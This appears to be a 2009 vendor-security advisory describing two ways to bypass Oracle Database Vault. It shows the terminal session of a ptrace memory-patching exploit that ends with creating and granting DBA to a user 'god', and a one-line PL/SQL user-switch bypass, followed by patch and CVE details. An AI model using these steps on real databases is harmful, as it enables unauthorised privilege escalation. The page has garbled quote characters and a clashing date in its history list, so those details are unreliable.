Oracle Database Vault ptrace(2) Privilege Escalation Exploit

Services
Oracle Audit / Hardening
Security Training
Consulting

Information
Oracle Security Blog
Published Alerts
Upcoming Alerts
Patch Information
Whitepaper
Presentations
Oracle Fact Sheets
Exploits
Tutorials
Videos
Scripts

News & Events
Events
News

Company
Contact
People
Partner
Impressum
Sitemap

Name Oracle Database Vault ptrace(2) Privilege Escalation Exploit

Systems Affected Oracle Database Vault

Severity High Risk

Category Escalate user privileges

Vendor URL http://www.oracle.com/

Credit Jakub 'vnull' Wartak

Exploit http://vnull.pcnet.com.pl/codez/ora_dv_mem_off.c

Date 20 Nov 2008

Details

Jakub Wartak has posted an exploit showing how to switch DV off on his blog.Jakub describes that he was surprised that Data Vault does not protect from OS side. That’s something many people are not aware of. Oracle Data Vault is not designed to protect from normal DBAs (with OS access).

Example
[oracle@xeno ora_dv_mem_off]$ !gcc
gcc -Wall ora_dv_mem_off.c -o ora_dv_mem_off -lbfd -liberty
ora_dv_mem_off.c: In function ‘locate_dv_func?:
ora_dv_mem_off.c:92: warning: initialization discards qualifiers from pointer
target type
ora_dv_mem_off.c:93: warning: initialization makes pointer from integer
without a cast
[oracle@xeno ora_dv_mem_off]$ ./ora_dv_mem_off
[17035] starting to trace sqlplus process (17036)
[***] NOW TYPE IN SQLPLUS: conn / as sysdba
[17035] execve() syscall in 17036

SQL*Plus: Release 10.2.0.3.0 - Production on Wed Feb 27 18:56:55 2008

Copyright (c) 1982, 2006, Oracle. All Rights Reserved.

SQL> conn / as sysdba
[17035] clone() syscall in 17036, tracing orapid=17037
[17035] execve() syscall in 17037,
[17035] symbol “kzvtins? at 0xb185820
[***] sucessfuly validated function, DatabaseVault=1
[***] attempting to rewrite memory at 0xb185824
Connected.
SQL> create user god identified by abc;

User created.

SQL> grant dba,dv_admin,dv_owner,connect,resource to god;

Grant succeeded.

Alexander Kornbrust found another (easier) way to bypass Data Vault without installing/compiling software. He found this issue a few months ago (in Oracle 11.1.0.6). After contacting secalert they told him that this issue was already fixed in Oracle CPU July 2008 (but not documented):
? run as user with DBA privleges

SQL> exec sys.kupp$proc.change_user(’DVA?);

PL/SQL procedure successfully completed.

Patch Information
Apply the latest Oracle Security patches (e.g. CPU April 2009 )

History
13-jan-2009 Oracle published CPU April 2009 [CVE-2009-0981]
14-apr-2009 Oracle published CPU April 2009 [CVE-2009-0981]
14-apr-2009 Advisory published

ƒD 2009 by Red-Database-Security GmbH - last update 30-jun-2009

Definition Exploit
An exploit is a common term in the computer security to refer to a piece of software that take advantage of a bug or vulnerability leading to a privilege escalation or d.o.s. on a computer system.
Computer security experts are using exploit code to test if a patch is working properly.